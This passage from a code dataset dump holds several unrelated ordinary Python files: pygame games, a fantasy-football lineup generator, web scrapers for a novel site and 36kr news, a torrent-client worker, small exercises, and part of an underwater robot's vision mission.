status.puntuacion = puntuacion\n status.pasado = pasado\n return status\ndef muestranivel(screen,nivel):\n clock = pygame.time.Clock()\n black = 0, 0, 0\n cont = 0\n screen.fill(black)\n font = pygame.font.Font(pygame.font.get_default_font(), 24)\n\n while cont<120:\n clock.tick(60)\n textsurface = font.render('Level ' + str(nivel), False, (255, 255, 255))\n screen.blit(textsurface,(70,70))\n pygame.display.update()\n cont += 1\n\ndef main():\n # Se inicializa el juego\n\n pygame.init()\n pygame.display.set_caption(\"Título del juego\")\n nivel = 1\n flags = FULLSCREEN | DOUBLEBUF\n #flags = DOUBLEBUF\n screen = pygame.display.set_mode((320,224),flags,8)\n screen.set_alpha(None)\n status = Status()\n #intro(screen)\n while True:\n muestranivel(screen,nivel)\n if nivel!=3:\n status = fase(screen, nivel, status)\n else:\n status = fasesonic(screen, nivel, status)\n if status.pasado:\n nivel += 1\n if nivel > 4:\n muestrapasado(screen)\n status.vidas = 5\n status.puntuacion = 0\n nivel = 1\n else:\n gameover(screen)\n status.vidas = 5\n status.puntuacion = 0\n nivel = 1\n\n\n# Este fichero es el que ejecuta el juego principal\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"ArturGame.py","file_name":"ArturGame.py","file_ext":"py","file_size_in_byte":27485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441385570","text":"def create_all_lineups(qb_df_small, rb_df_small, wr_df_small, te_df_small, dst_df_small, point_thresh):\r\n import pandas as pd\r\n import numpy as np\r\n from itertools import combinations\r\n\r\n \"Data frame to vectors to allow for much faster looping\"\r\n qb_player = qb_df_small['Player'].values\r\n rb_player = rb_df_small['Player'].values\r\n wr_player = wr_df_small['Player'].values\r\n te_player = te_df_small['Player'].values\r\n dst_player = dst_df_small['Player'].values\r\n\r\n qb_salary = qb_df_small['Salary'].values\r\n rb_salary = rb_df_small['Salary'].values\r\n wr_salary = wr_df_small['Salary'].values\r\n te_salary = te_df_small['Salary'].values\r\n dst_salary = dst_df_small['Salary'].values\r\n\r\n qb_points = qb_df_small['DK_Points'].values\r\n rb_points = rb_df_small['DK_Points'].values\r\n wr_points = wr_df_small['DK_Points'].values\r\n te_points = te_df_small['DK_Points'].values\r\n dst_points = dst_df_small['DK_Points'].values\r\n \r\n \"Initialize Vectors for all possible all_lineupss under salary requirements\"\r\n qb_all = []\r\n rb1_all = []\r\n rb2_all = []\r\n 
wr1_all = []\r\n wr2_all = []\r\n wr3_all = []\r\n te1_all = []\r\n flex_all = []\r\n dst1_all = []\r\n points_all = []\r\n salary_all = []\r\n\r\n \"Setup unique combinations (avoid duplicates with multiple slots) - RB As Flex\"\r\n qb = list(combinations(range(len(qb_df_small)), 1))\r\n rb = list(combinations(range(len(rb_df_small)), 3))\r\n wr = list(combinations(range(len(wr_df_small)), 3))\r\n te = list(combinations(range(len(te_df_small)), 1))\r\n dst = list(combinations(range(len(dst_df_small)), 1))\r\n\r\n for a in qb:\r\n for b in rb:\r\n for c in wr:\r\n for d in te:\r\n for e in dst:\r\n total_salary = qb_salary[a[0]] + rb_salary[b[0]] + rb_salary[b[1]] + wr_salary[c[0]] + wr_salary[\r\n c[1]] + wr_salary[c[2]] + rb_salary[b[2]] + te_salary[d[0]] + dst_salary[e[0]]\r\n if total_salary < 50001 and total_salary > 49499:\r\n total_points = qb_points[a[0]] + rb_points[b[0]] + rb_points[b[1]] + wr_points[c[0]] + \\\r\n wr_points[c[1]] + wr_points[c[2]] + rb_points[b[2]] + te_points[d[0]] + \\\r\n dst_points[e[0]]\r\n if total_points > point_thresh:\r\n qb_all.append(qb_player[a[0]])\r\n rb1_all.append(rb_player[b[0]])\r\n rb2_all.append(rb_player[b[1]])\r\n wr1_all.append(wr_player[c[0]])\r\n wr2_all.append(wr_player[c[1]])\r\n wr3_all.append(wr_player[c[2]])\r\n te1_all.append(te_player[d[0]])\r\n flex_all.append(rb_player[b[2]])\r\n dst1_all.append(dst_player[e[0]])\r\n points_all.append(total_points)\r\n salary_all.append(total_salary)\r\n\r\n # \"Setup unique combinations (avoid duplicates with multiple slots) - WR As Flex\"\r\n # rb = list(combinations(range(len(rb_df_small)), 2))\r\n # wr = list(combinations(range(len(wr_df_small)), 4))\r\n\r\n # for a in qb:\r\n # for b in rb:\r\n # for c in wr:\r\n # for d in te:\r\n # for e in dst:\r\n # total_salary = qb_salary[a[0]] + rb_salary[b[0]] + rb_salary[b[1]] + wr_salary[c[0]] + wr_salary[\r\n # c[1]] + wr_salary[c[2]] + wr_salary[c[3]] + te_salary[d[0]] + dst_salary[e[0]]\r\n # if total_salary < 50001 and total_salary > 49499:\r\n # total_points = qb_points[a[0]] + rb_points[b[0]] + rb_points[b[1]] + wr_points[c[0]] + \\\r\n # wr_points[c[1]] + wr_points[c[2]] + wr_points[c[3]] + te_points[d[0]] + \\\r\n # dst_points[e[0]]\r\n # if total_points > point_thresh:\r\n # qb_all.append(qb_player[a[0]])\r\n # rb1_all.append(rb_player[b[0]])\r\n # rb2_all.append(rb_player[b[1]])\r\n # wr1_all.append(wr_player[c[0]])\r\n # wr2_all.append(wr_player[c[1]])\r\n # wr3_all.append(wr_player[c[2]])\r\n # te1_all.append(te_player[d[0]])\r\n # flex_all.append(wr_player[c[3]])\r\n # dst1_all.append(dst_player[e[0]])\r\n # points_all.append(total_points)\r\n # salary_all.append(total_salary)\r\n\r\n # \"Setup unique combinations (avoid duplicates with multiple slots) - TE As Flex\"\r\n # wr = list(combinations(range(len(wr_df_small)), 3))\r\n # te = list(combinations(range(len(te_df_small)), 2))\r\n\r\n # for a in qb:\r\n # for b in rb:\r\n # for c in wr:\r\n # for d in te:\r\n # for e in dst:\r\n # total_salary = qb_salary[a[0]] + rb_salary[b[0]] + rb_salary[b[1]] + wr_salary[c[0]] + wr_salary[\r\n # c[1]] + wr_salary[c[2]] + te_salary[d[0]] + te_salary[d[1]] + dst_salary[e[0]]\r\n # if total_salary < 50001 and total_salary > 49499:\r\n # total_points = qb_points[a[0]] + rb_points[b[0]] + rb_points[b[1]] + wr_points[c[0]] + \\\r\n # wr_points[c[1]] + wr_points[c[2]] + te_points[d[0]] + te_points[d[1]] + \\\r\n # dst_points[e[0]]\r\n # if total_points > point_thresh:\r\n # qb_all.append(qb_player[a[0]])\r\n # rb1_all.append(rb_player[b[0]])\r\n # 
rb2_all.append(rb_player[b[1]])\r\n # wr1_all.append(wr_player[c[0]])\r\n # wr2_all.append(wr_player[c[1]])\r\n # wr3_all.append(wr_player[c[2]])\r\n # te1_all.append(te_player[d[0]])\r\n # flex_all.append(te_player[d[1]])\r\n # dst1_all.append(dst_player[e[0]])\r\n # points_all.append(total_points)\r\n # salary_all.append(total_salary)\r\n \r\n \"Assign Vectors back to data frame to write to CSV\"\r\n all_lineups = pd.DataFrame(np.random.randint(low=0, high=10, size=(len(qb_all),11)),columns=['QB', 'RB1', 'RB2', 'WR1', 'WR2', 'WR3', 'TE', 'Flex', 'DST', 'Points', 'Salary'])\r\n all_lineups['QB'] = qb_all\r\n all_lineups['RB1'] = rb1_all\r\n all_lineups['RB2'] = rb2_all\r\n all_lineups['WR1'] = wr1_all\r\n all_lineups['WR2'] = wr2_all\r\n all_lineups['WR3'] = wr3_all\r\n all_lineups['TE'] = te1_all\r\n all_lineups['Flex'] = flex_all\r\n all_lineups['DST'] = dst1_all\r\n all_lineups['Points'] = points_all\r\n all_lineups['Salary'] = salary_all\r\n all_lineups.sort_values(by=['Points'], inplace=True, ascending=False)\r\n \r\n \"Drop Low Scoring Lineups & Lineups that don't utilize the Salary Cap\"\r\n all_lineups = all_lineups.reset_index(drop=True)\r\n return all_lineups","sub_path":"Create_All_Lineups.py","file_name":"Create_All_Lineups.py","file_ext":"py","file_size_in_byte":7551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"33180785","text":"\"\"\"\nMultiparent modelling example.\n\nAltought it's unsupported yet, this example contains data to illustrate the behavior of SDV\nwhen modelling and sampling multiparent tables, that is, tables that contain multiple foreign_keys\nfrom other tables.\n\nYou can run this example with:\n\n```\ncd examples/multiparent_example\npython multiparent_example.py\n```\n\n\"\"\"\n\nfrom sdv import SDV\n\n\ndef run_example():\n \"\"\"Example of usage of SDV for tables contanining more than one foreign key.\"\"\"\n # Setup\n vault = SDV('data/meta.json')\n vault.fit()\n\n # Run\n result = vault.sample_all()\n\n for name, table in result.items():\n print('Samples generated for table {}:\\n{}\\n'.format(name, table.head(5)))\n\n\nif __name__ == '__main__':\n run_example()\n","sub_path":"examples/multiparent_example/multiparent_example.py","file_name":"multiparent_example.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157061751","text":"from __future__ import print_function\nimport re\nimport yaml\nimport os.path\nimport glob\nimport requests\nimport json\n\nTHISDIR=os.path.abspath(os.path.dirname(__file__))\n\nclass Corpus(object):\n\n def __init__(self,id,name):\n self.id=id\n self.name=name\n self.dbs=[]\n # #expand path - space separated list of paths that can be globbed or are a directory\n # for p in paths.split():\n # if os.path.isdir(p):\n # p=os.path.join(p,'*.db')\n # self.dbs.extend(sorted(glob.glob(p)))\n\n def as_dict(self):\n return {\"id\":self.id,\"name\":self.name}#,\"dbs\":self.dbs}\n\ndef get_corpora(corpora_yaml,solr_url):\n r=requests.get(solr_url+\"/select\",params={\"q\":\"*:*\",\"stats\":\"on\",\"stats.field\":\"source\",\"stats.calcdistinct\":\"true\",\"rows\":\"0\",\"wt\":\"json\"})\n response=r.text\n if not response.strip():\n return {}\n known_corpora=json.loads(response)[\"stats\"][\"stats_fields\"][\"source\"][\"distinctValues\"] #corpus ids known in solr\n corpora={} # id -> Corpus()\n with open(corpora_yaml) as f:\n for corpus_id_re, corpus_data in 
yaml.load(f).iteritems():\n #Which corpora match?\n corpus_id_re=re.compile(u\"^\"+corpus_id_re+u\"$\")\n for known_c in known_corpora:\n match=corpus_id_re.match(known_c)\n if match:\n cname=match.expand(corpus_data[\"name\"])\n c=Corpus(known_c,cname)\n corpora[c.id]=c.as_dict()\n return corpora\n\ndef matching_corpora(idregex,corpora):\n idre=re.compile(idregex)\n return sorted(cid for cid in corpora if idre.match(cid))\n\ndef get_corpus_groups(available_corpora_yaml,corpora):\n groups=[]\n with open(available_corpora_yaml) as f:\n for cgroup in yaml.load(f):\n group_corpus_ids=[]\n for regex in cgroup[\"corpora\"].split():\n group_corpus_ids.extend(matching_corpora(regex,corpora))\n group_corpus_names=list(corpora[c][\"name\"] for c in group_corpus_ids)\n groups.append({\"name\":cgroup[\"name\"],\"corpora\":list(zip(group_corpus_ids,group_corpus_names))})\n return groups\n\nif __name__==\"__main__\":\n corpora=get_corpora(os.path.join(THISDIR,\"corpora.yaml\"),\"http://localhost:8983/solr/depsearch6\")\n corpus_groups=get_corpus_groups(os.path.join(THISDIR,\"corpus_groups.yaml\"),corpora)\n print(corpus_groups)\n\n","sub_path":"api_gui/webapi/available_corpora.py","file_name":"available_corpora.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"338814001","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport my_tools\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nspace='\\t'\nenter='\\r\\n'\n\n\n\nclass BiqugePipeline:\n\n\n def process_item(self, item, spider):\n\n with open('./{}-{}-{}.txt'.format(item['title'],item['author'],item['category']),'a',encoding='utf-8') as f:\n f.write(item['title'])\n f.write(space+item['des'])\n f.write(enter)\n f.write(enter)\n\n f.write('目录')\n f.write(enter)\n f.write(enter)\n for i in item['chapter']:\n chapter_name=item['chapter'][i][0]\n f.write(space + chapter_name)\n f.write(enter)\n f.write(enter)\n\n\n\n\n for i in item['chapter']:\n chapter_name,chapter_content=item['chapter'][i]\n f.write(space + chapter_name)\n f.write(enter)\n for j in chapter_content:\n j=my_tools.qu_kong_ge(j)\n j=my_tools.qu_html_lable(j)\n f.write(space+space + j)\n f.write(enter)\n f.write(enter)\n","sub_path":"scrapy-demo/biquge/biquge/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"204995693","text":"import pygame\npygame.init()\nwin = pygame.display.set_mode((500, 500))\n\n\n#название окна приложения\npygame.display.set_caption('score and multiplication table')\n\n#координаты игрока, которые можно регулировать\nx = 50\ny = 425\nwidth = 40\nheight = 60\nspeed = 5\n\nisJump = False\njumpCount = 10\n\nrun = True\nwhile run:\n pygame.time.delay(35)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and x > 5:\n x -= speed\n if keys[pygame.K_RIGHT] and x < 500 - width - 5:\n x += speed\n if not (isJump):\n if keys[pygame.K_UP] and y > 5:\n y -= speed\n if keys[pygame.K_DOWN] and y < 500 - height - 15:\n y += speed\n if keys[pygame.K_SPACE]:\n isJump = True\n else:\n if jumpCount >= -10:\n if jumpCount < 0:\n y += (jumpCount ** 2) / 2\n else:\n y -= (jumpCount ** 2) / 2\n jumpCount -= 1\n else:\n isJump = False\n 
jumpCount = 10\n\n win.fill((0,0,0))\n pygame.draw.rect(win, (163,73,164), (x, y, width, height))\n pygame.display.update()\n\npygame.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41378948","text":"from PyQt5.QtCore import pyqtSlot, pyqtSignal, QObject\nfrom clutch.core import TransmissionRPCError\nfrom transmigrate.transmigrate.core import Transmigrate\n\n\ndef transmigrate_worker(progress, add_torrent, search_folders, torrents):\n work = TransmigrateWork()\n work.progress.connect(progress)\n work.added_torrent.connect(add_torrent)\n work.run(search_folders, torrents)\n work.progress.disconnect(progress)\n\n\ndef transmigrate_torrents(callback):\n print(callback)\n work = TransmigrateWork()\n print(\"hmmm\")\n work.torrents.connect(callback)\n print(\"lol\")\n work.get_client_torrents()\n work.torrent.disconnect(callback)\n\n\ndef transmigrate_remove_all():\n work = TransmigrateWork()\n work.transmigrate.remove_all_torrents()\n\n\ndef transmigrate_get_collected(callback, dirs):\n print(callback, dirs)\n work = TransmigrateWork()\n work.torrentfiles.connect(callback)\n work.get_collected_files(dirs)\n\n\nclass TransmigrateWork(QObject):\n '''Class that handles Transmigrate work - repeated slow calls to Transmission'''\n\n progress = pyqtSignal(int)\n added_torrent = pyqtSignal(str, str)\n torrents = pyqtSignal(list)\n torrentfiles = pyqtSignal(object)\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self.transmigrate = Transmigrate()\n\n def get_client_torrents(self):\n print(\"called!\")\n self.torrents.emit(self.transmigrate.get_client_torrents())\n\n def get_collected_files(self, dirs):\n print(\"called! 
transmigrate work\")\n self.torrentfiles.emit(self.transmigrate.torrent_collector.collect_file_dirs(dirs))\n print(\"emitted signal\")\n\n def run(self, search_folders, torrent_files):\n if len(search_folders) > 0:\n for folder in search_folders:\n self.transmigrate.storage_manager.add_storage_dir(folder)\n\n if len(torrent_files) > 0:\n # initialize progress bar\n total = len(torrent_files)\n progress = 0\n self.progress.emit(0)\n\n for torrent_file in torrent_files:\n try:\n response = self.transmigrate.add_to_transmission(torrent_file)\n location_match = self.transmigrate.storage_manager.find_existing_storage(torrent_file)\n if location_match:\n self.transmigrate.set_storage(response['id'], location_match)\n self.transmigrate.verify_storage(response['id'])\n self.added_torrent.emit(torrent_file.get_name(), str(location_match))\n except TransmissionRPCError as error:\n if error.args[0] == 'torrent-duplicate':\n pass\n else:\n pass # error-handling\n # increment progress\n progress += 1\n self.progress.emit(int(progress / total * 100))\n","sub_path":"transmigrate/gui/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"569828276","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 11 17:40:07 2020\r\n\r\n@author: Naomi\r\n\"\"\"\r\n\r\n#Some simple math\r\n\r\n#Store a 3-digit number in a\r\na=123\r\n#Write the digits of a twice\r\nb=123123\r\n#Check whether b can be divided by 7\r\nif b%7==0:\r\n print('b can be divided by 7')\r\nelse:\r\n print('b cannot be divided by 7')\r\n#Assign c to be b divided by 7\r\nc=b/7\r\n#Assign d to be c divided by 11\r\nd=c/11\r\n#Assign e to be c divided by 13\r\ne=d/13\r\n#Compare e to a\r\nif e>a:\r\n print('e is greater than a')\r\nelif emax:\n max = itm\n return (min, max)\n \nnmbs = [-13, 27, 59, -70, 44]\na, b = minmax(nmbs)\nprint('Minimum: %d Maximum: %d' % (a, b))\n","sub_path":"examples/loesungen-kap09-func/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"589840980","text":"import datetime\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom urllib.parse import urlparse\nfrom urllib.parse import parse_qs\nimport os\nimport re\nimport sys\nimport json\nimport pydash as _\nimport pprint\nfrom pytz import timezone\nimport time\n\npp = pprint.PrettyPrinter(indent=4)\n\nsys.path.append('..')\nfrom es.es_client import EsClient\n\nclass TestSpider(scrapy.Spider):\n name = '36kr_all'\n domin = 'https://www.36kr.com'\n source = '36kr'\n current = 0\n total = 0\n\n def start_requests(self):\n self.es = EsClient()\n start_url = 'https://www.36kr.com/information/web_news/'\n yield scrapy.Request(start_url)\n\n def parse(self, response):\n\n pageCallback = re.findall(\n r'(?<=\"pageCallback\":\")(.*?)(?=\")', str(response.text))\n if len(pageCallback) == 0:\n os._exit(0)\n\n pageCallback = pageCallback[0]\n\n firstListJosn = re.findall(\n r'(?<=)', str(response.text))\n firstList = json.loads(firstListJosn[0])\n items = _.get(firstList, 'information.informationList.itemList')\n\n self.itemsImport(items)\n \n yield self.getNextQuery(pageCallback)\n \n def itemsImport(self, items):\n \n yesterday = (datetime.date.today() + datetime.timedelta(days=-1)).strftime(\"%Y-%m-%d\")\n today = datetime.date.today().strftime(\"%Y-%m-%d\")\n \n start_time = 
int(time.mktime(time.strptime(str(yesterday), '%Y-%m-%d')))\n end_time = int(time.mktime(time.strptime(str(today), '%Y-%m-%d')))\n \n\n bulk = []\n to_next = True\n for item in items:\n t = item['templateMaterial']\n if 'widgetTitle' not in t:\n continue\n\n doc = {}\n doc['title'] = t['widgetTitle']\n doc['url'] = self.domin + '/p/' + str(t['itemId'])\n\n if 'authorName' in t:\n doc['author'] = t['authorName']\n\n if 'authorRoute' in t: \n userId = t['authorRoute'].replace('detail_author?userId=', '')\n doc['author_url'] = self.domin + '/user/' + str(userId)\n\n doc['source'] = self.source\n \n if 'themeName' in t:\n doc['tag'] = t['themeName']\n \n if 'summary' in t:\n doc['summary'] = t['summary']\n\n created_at = int(t['publishTime']/1000)\n \n if created_at > end_time:\n print(\"too new\")\n continue;\n \n if created_at < start_time :\n to_next = False\n print(\"too old\")\n continue;\n \n \n date_time_obj = datetime.datetime.fromtimestamp(\n t['publishTime']/1000)\n\n doc['created_at'] = date_time_obj.astimezone(timezone(\"UTC\")).strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n doc['created_year'] = date_time_obj.strftime(\"%Y\")\n\n bulk.append(\n {\"index\": {\"_index\": \"article\"}})\n bulk.append(doc)\n\n if len(bulk) > 0:\n resp = self.es.client.bulk(body=bulk)\n \n if not to_next:\n os._exit(0)\n \n def getNextQuery(self, pageCallback):\n flow_url = 'https://gateway.36kr.com/api/mis/nav/ifm/subNav/flow'\n \n payload = {\n \"partner_id\": \"web\",\n \"timestamp\": 1662859338075,\n \"param\": {\n \"subnavType\": 1,\n \"subnavNick\": \"web_news\",\n \"pageSize\": 100,\n \"pageEvent\": 1,\n \"pageCallback\": pageCallback,\n \"siteId\": 1,\n \"platformId\": 2\n }\n }\n return scrapy.http.JsonRequest(flow_url, data=payload, callback=lambda response, payload=payload : self.nextPageParse(response, payload))\n \n def nextPageParse(self, reponse, payload):\n resp = json.loads(reponse.text)\n \n pageCallback = _.get(resp,'data.pageCallback')\n items = _.get(resp,'data.itemList')\n hasNextPage = _.get(resp,'data.hasNextPage')\n \n self.itemsImport(items)\n \n \n if hasNextPage == 1:\n yield self.getNextQuery(pageCallback)\n # pp.pprint(resp)\n\n\nif __name__ == \"__main__\":\n process = CrawlerProcess()\n process.crawl(TestSpider)\n process.start()\n","sub_path":"scrapy/36kr/36kr_daily.py","file_name":"36kr_daily.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616101046","text":"from item import Item\n\nclass Consumable(Item):\n\t\"\"\"\n\t\"\"\"\n\tdef __init__(self, name, health, sprite):\n\t\tsuper(Consumable, self).__init__(name, True, True, False, health, 0, 0,\n\t\t\tsprite)\n\t\n\tdef debug(self):\n\t\tfrom database import Database as db\n\t\tsuper(Consumable, self).debug()\n\t\tprint(\" {0}: {1}\\n {2}: {3}\".format(\n\t\t\tdb.strings[9], db.strings[10], db.strings[5], self.health))\n\t\t# Traditional version:\n\t\t# print(\" \", db.strings[9], \": \", db.strings[10], sep=\"\")\n\t\t# print(\" \", db.strings[5], \": \", self.health, sep=\"\")\n","sub_path":"project/consumable.py","file_name":"consumable.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640267692","text":"from app.libs.files.lib_file import LibFile\nfrom app.libs.patterns.singleton import Singleton\nfrom app.libs.pagination.pagination import Pagination\n\n\nclass BaseService(metaclass=Singleton):\n db_repo = None\n\n def 
__init__(self):\n self._lib_file = LibFile()\n\n def get_next_id(self, db_table=None, is_update=False):\n if self.db_repo is not None:\n if db_table is None:\n db_table = self.db_repo.db_table\n return self.db_repo.get_next_sequence(db_table, is_update)\n return 1\n\n def get_data_by_pk(self, pk):\n item = None\n if self.db_repo is not None:\n item = self.db_repo.get_data_by_pk(pk)\n\n return item\n\n def save(self, data: dict):\n if self.db_repo is not None:\n return self.db_repo.save(data)\n return None\n\n def delete(self, pk):\n if self.db_repo is not None:\n return self.db_repo.delete(pk)\n return None\n\n def count(self, conditions):\n if self.db_repo is not None:\n return self.db_repo.count(conditions)\n return 0\n\n def get_items(self, conditions={}, page=0, limit=100, sort_field=\"_id\"):\n items = None\n if self.db_repo is not None:\n # start Pagination\n total = self.count(conditions)\n pagination = Pagination(total, limit, int(page))\n start = (int(page) - 1) if int(page) > 0 else int(page)\n # end Pagination\n items = self.db_repo.find(conditions, start, limit, sort_field)\n\n return items, pagination\n","sub_path":"app/services/base/base_service.py","file_name":"base_service.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"36749039","text":"import sys\n\nclass Solution:\n # Write your code here\n stack = []\n queue = []\n x = 0\n y = 0\n z = 0 \n def pushCharacter(self,char) :\n self.stack.append(char)\n self.x = self.x + 1\n \n def popCharacter(self) :\n self.x = self.x - 1\n #print (self.x , \":\" , self.stack[self.x])\n return (self.stack[self.x])\n \n def enqueueCharacter(self,char):\n self.queue.append(char) \n self.y = self.y + 1\n \n def dequeueCharacter(self) :\n #print (self.queue , \"#\" , self.z , \"#\" , self.queue[self.z])\n if self.z == 0 :\n self.z = self.z + 1\n return (self.queue[0])\n else:\n self.z = self.z + 1\n return (self.queue[self.z - 1])\n\n\n \n \n \n\n# read the string s\n#s=input()\ns = 'racecar'\n#Create the Solution class object\nobj=Solution() \n\nl=len(s)\n# push/enqueue all the characters of string s to stack\nfor i in range(l):\n obj.pushCharacter(s[i])\n obj.enqueueCharacter(s[i])\n \nisPalindrome=True\n'''\npop the top character from stack\ndequeue the first character from queue\ncompare both the characters\n''' \nfor i in range(l // 2):\n if obj.popCharacter()!=obj.dequeueCharacter():\n isPalindrome=False\n break\n#finally print whether string s is palindrome or not.\nif isPalindrome:\n print(\"The word, \"+s+\", is a palindrome.\")\nelse:\n print(\"The word, \"+s+\", is not a palindrome.\") ","sub_path":"prb18.py","file_name":"prb18.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"103047363","text":"import math\nimport random\nimport time\nfrom collections import namedtuple, deque\nimport numpy as np\n\nimport shm\nimport aslam\nfrom mission.constants.config import recovery as constants\nfrom mission.constants.region import WALL_TOWER_HEADING\nfrom shm import recovery_state as world\nfrom shm.watchers import watcher\nfrom mission.framework.task import Task\nfrom mission.framework.targeting import DownwardTarget, PIDLoop\nfrom mission.framework.combinators import Sequential, Concurrent, MasterConcurrent\nfrom mission.framework.movement import Depth, RelativeToCurrentHeading, RelativeToCurrentDepth, \\\n VelocityX, VelocityY, Heading\nfrom 
mission.framework.timing import Timer, Timeout\nfrom mission.framework.primitive import Zero, FunctionTask, NoOp, Log\nfrom mission.framework.helpers import get_downward_camera, ConsistencyCheck\nfrom mission.framework.actuators import SetActuators\nfrom mission.framework.position import MoveXY, MoveXYRough, MoveX, MoveY, GoToPosition, PositionalControl\nfrom mission.framework.search import SpiralSearch\nfrom mission.framework.track import Tracker, ConsistentObject\nfrom mission.missions.ozer_common import Retry, Success, SequentialSuccess, CheckDistance, \\\n Conditional\nfrom auv_python_helpers.angles import heading_sub_degrees\n\n\"\"\"\n ____ ___ ____ ________\n / __ \\___ _________ _ _____ _______ __ |__ \\ / __ < / ___/\n / /_/ / _ \\/ ___/ __ \\ | / / _ \\/ ___/ / / / __/ // / / / / __ \\\n / _, _/ __/ /__/ /_/ / |/ / __/ / / /_/ / / __// /_/ / / /_/ /\n/_/ |_|\\___/\\___/\\____/|___/\\___/_/ \\__, / /____/\\____/_/\\____/\n /____/\n\"\"\"\n\n# TODO: rearrange stuff in file to make more sense\n# TODO: log successes and failures of same task in same task?\n# TODO: refactor vision results shm group into separate, per-object groups?\n\nclass Vision(Task):\n STACK_FIELDS = ['visible', 'red', 'x', 'y', 'area', 'aspect_ratio', 'angle']\n MARK_FIELDS = ['visible', 'x', 'y', 'area']\n REGION_FIELDS = ['visible', 'x', 'y', 'area']\n TABLE_FIELDS = ['visible', 'x', 'y', 'area']\n Stack = namedtuple('Stack', STACK_FIELDS)\n Mark = namedtuple('Mark', MARK_FIELDS)\n Region = namedtuple('Region', REGION_FIELDS)\n Table = namedtuple('Table', TABLE_FIELDS)\n COLORS = ['red', 'green']\n TRACKING_REJECT_WIDTH_RATIO = 0.15\n\n def on_first_run(self, camera, *args, **kwargs):\n self.camera = camera\n self.watcher = watcher()\n self.watcher.watch(shm.recovery_vision)\n\n self.stacks = [None] * 4\n tracker = lambda: Tracker(self.camera['width'] * Vision.TRACKING_REJECT_WIDTH_RATIO)\n self.red_stack_tracker = tracker()\n self.green_stack_tracker = tracker()\n self.mark_mappings = {color: ConsistentObject() for color in Vision.COLORS}\n self.region_mappings = {color: ConsistentObject() for color in Vision.COLORS}\n self.blocker_mappings = {color: ConsistentObject() for color in Vision.COLORS}\n self.table_mapping = ConsistentObject()\n\n self.pull()\n\n def on_run(self, *args, **kwargs):\n if self.watcher.has_changed():\n self.pull()\n\n def pull(self):\n self.shm = shm.recovery_vision.get()\n self.cam_center = (self.camera['width'] / 2, self.camera['height'] / 2)\n self.pull_stacks()\n self.pull_marks()\n self.pull_regions()\n self.pull_blockers()\n self.pull_table()\n\n def pull_stacks(self):\n red_stacks, green_stacks = [], []\n for i in range(4):\n vals = {}\n for field in Vision.STACK_FIELDS:\n vals[field] = getattr(self.shm, 'stack_{}_{}'.format(i+1, field))\n stack = Vision.Stack(**vals)\n if stack.visible:\n if stack.red:\n red_stacks.append(stack)\n else:\n green_stacks.append(stack)\n pad_list = lambda x: x + ([None] * (2 - len(x)))\n red_stacks = pad_list(red_stacks)\n green_stacks = pad_list(green_stacks)\n\n new_red_stacks = self.red_stack_tracker.track(*red_stacks)\n new_green_stacks = self.green_stack_tracker.track(*green_stacks)\n for i, s in enumerate(new_red_stacks + new_green_stacks):\n if s is not None and self.stacks[i] is None:\n self.logv('Started tracking {} stack at index {}'.format(\n 'red' if s.red else 'green', i))\n elif s is None and self.stacks[i] is not None:\n self.logv('Stopped tracking {} stack at index {}'.format(\n 'red' if self.stacks[i].red else 'green', i))\n 
self.stacks[i] = s\n\n self.debug_locations(self.stacks, 0)\n\n def pull_marks(self):\n self.marks = []\n for color in Vision.COLORS:\n vals = {}\n for field in Vision.MARK_FIELDS:\n vals[field] = getattr(self.shm, '{}_mark_{}'.format(color, field))\n mark = Vision.Mark(**vals)\n self.marks.append(self.mark_mappings[color].map(mark))\n\n self.debug_locations(self.marks, len(self.stacks))\n\n def pull_regions(self):\n self.regions = []\n for color in Vision.COLORS:\n vals = {}\n for field in Vision.REGION_FIELDS:\n vals[field] = getattr(self.shm, '{}_region_{}'.format(color, field))\n region = Vision.Region(**vals)\n self.regions.append(self.region_mappings[color].map(region))\n\n self.debug_locations(self.regions, len(self.stacks) + len(self.marks))\n\n def pull_blockers(self):\n self.blockers = {}\n for color in Vision.COLORS:\n blocker = getattr(self.shm, '{}_stack_blocking'.format(color))\n if not blocker:\n blocker = None\n self.blockers[color] = self.blocker_mappings[color].map(blocker)\n\n def pull_table(self):\n vals = {field: getattr(self.shm, 'table_{}'.format(field)) for field in Vision.TABLE_FIELDS}\n table = 